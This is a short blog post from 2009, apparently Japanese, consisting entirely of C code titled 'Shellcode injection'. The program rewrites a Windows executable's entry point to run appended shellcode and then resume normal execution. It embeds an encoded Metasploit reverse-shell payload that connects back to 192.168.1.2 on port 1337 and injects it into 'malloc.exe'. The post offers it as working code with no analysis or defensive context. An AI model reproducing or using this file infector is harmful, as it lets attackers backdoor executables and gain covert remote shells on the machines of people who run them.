2009年1月11日日曜日

[C] Shellcode injection

#include
#include
void InsertShellCode(char *szFileName,BYTE* ShellCode,int nCodeSize)
{
HANDLE hFile = CreateFile(szFileName,GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
HANDLE hMap = CreateFileMapping(hFile,NULL,PAGE_READWRITE,0,0,NULL);
BYTE* pFileStart = (BYTE*)MapViewOfFile(hMap,FILE_MAP_ALL_ACCESS,0,0,0);

IMAGE_DOS_HEADER* pDosHeader = (IMAGE_DOS_HEADER*)pFileStart;
IMAGE_FILE_HEADER* pFileHeader = (IMAGE_FILE_HEADER *)(pFileStart + pDosHeader->e_lfanew + 4);
IMAGE_OPTIONAL_HEADER* pOptionalHeader = (IMAGE_OPTIONAL_HEADER*)(pFileStart + pDosHeader->e_lfanew + 24);
IMAGE_SECTION_HEADER* pSectionHeader = (IMAGE_SECTION_HEADER*)(pFileStart + pDosHeader->e_lfanew + 248);

nCodeSize += 12;

DWORD dwEntryPointRVA = pOptionalHeader->AddressOfEntryPoint;
DWORD dwEntryPointFileOffset = dwEntryPointRVA +(pSectionHeader[0].PointerToRawData)-(pSectionHeader[0].VirtualAddress);
DWORD dwCodePos = pSectionHeader[0].PointerToRawData + pSectionHeader[0].SizeOfRawData - nCodeSize;

BYTE jmp[7] = {0xE9,0x00,0x00,0x00,0x00,0x90,0x90};
*(DWORD*)(jmp + 1) = dwCodePos - dwEntryPointFileOffset - 5;
BYTE bjmp[5] = {0xE9};
*(DWORD*)(bjmp + 1) = (dwEntryPointFileOffset + 5) - ( dwCodePos + nCodeSize);

BYTE save[7];

for (int i = 0; i < 7; i++)
{
save[i] = pFileStart[dwEntryPointFileOffset+i];
}

for (int i = 0; i < 7; i++)
{
pFileStart[dwEntryPointFileOffset+i] = jmp[i];
}

for (int i = 0; i < (nCodeSize - 12); i++)
{
pFileStart[dwCodePos+i] = ShellCode[i];
}

int j = 0;

for (int i = (nCodeSize - 12);i < (nCodeSize - 5); i++)
{
pFileStart[dwCodePos+i] = save[j];
j++;
}

int k = 0;

for (int i = (nCodeSize - 5);i < nCodeSize; i++)
{
pFileStart[dwCodePos+i] = bjmp[k];
k++;
}
FlushViewOfFile(pFileStart,0);
UnmapViewOfFile(pFileStart);
CloseHandle(hMap);
CloseHandle(hMap);
}
int main(){
BYTE myshell[] =//* win32_reverse - EXITFUNC=thread LHOST=192.168.1.2 LPORT=1337 Size=312 Encoder=PexFnstenvSub http://metasploit.com */
"\x2b\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6e"
"\x67\x32\x0c\x83\xeb\xfc\xe2\xf4\x92\x0d\xd9\x41\x86\x9e\xcd\xf3"
"\x91\x07\xb9\x60\x4a\x43\xb9\x49\x52\xec\x4e\x09\x16\x66\xdd\x87"
"\x21\x7f\xb9\x53\x4e\x66\xd9\x45\xe5\x53\xb9\x0d\x80\x56\xf2\x95"
"\xc2\xe3\xf2\x78\x69\xa6\xf8\x01\x6f\xa5\xd9\xf8\x55\x33\x16\x24"
"\x1b\x82\xb9\x53\x4a\x66\xd9\x6a\xe5\x6b\x79\x87\x31\x7b\x33\xe7"
"\x6d\x4b\xb9\x85\x02\x43\x2e\x6d\xad\x56\xe9\x68\xe5\x24\x02\x87"
"\x2e\x6b\xb9\x7c\x72\xca\xb9\x4c\x66\x39\x5a\x82\x20\x69\xde\x5c"
"\x91\xb1\x54\x5f\x08\x0f\x01\x3e\x06\x10\x41\x3e\x31\x33\xcd\xdc"
"\x06\xac\xdf\xf0\x55\x37\xcd\xda\x31\xee\xd7\x6a\xef\x8a\x3a\x0e"
"\x3b\x0d\x30\xf3\xbe\x0f\xeb\x05\x9b\xca\x65\xf3\xb8\x34\x61\x5f"
"\x3d\x24\x61\x4f\x3d\x98\xe2\x64\xae\xcf\x33\x0e\x08\x0f\x37\x35"
"\x08\x34\xbb\xed\xfb\x0f\xde\xf5\xc4\x07\x65\xf3\xb8\x0d\x22\x5d"
"\x3b\x98\xe2\x6a\x04\x03\x54\x64\x0d\x0a\x58\x5c\x37\x4e\xfe\x85"
"\x89\x0d\x76\x85\x8c\x56\xf2\xff\xc4\xf2\xbb\xf1\x90\x25\x1f\xf2"
"\x2c\x4b\xbf\x76\x56\xcc\x99\xa7\x06\x15\xcc\xbf\x78\x98\x47\x24"
"\x91\xb1\x69\x5b\x3c\x36\x63\x5d\x04\x66\x63\x5d\x3b\x36\xcd\xdc"
"\x06\xca\xeb\x09\xa0\x34\xcd\xda\x04\x98\xcd\x3b\x91\xb7\x5a\xeb"
"\x17\xa1\x4b\xf3\x1b\x63\xcd\xda\x91\x10\xce\xf3\xbe\x0f\xdd\xc2"
"\x8e\x07\x61\xf3\xb8\x98\xe2\x0c";
InsertShellCode("malloc.exe",myshell,sizeof(myshell));
}

0 件のコメント:

コメントを投稿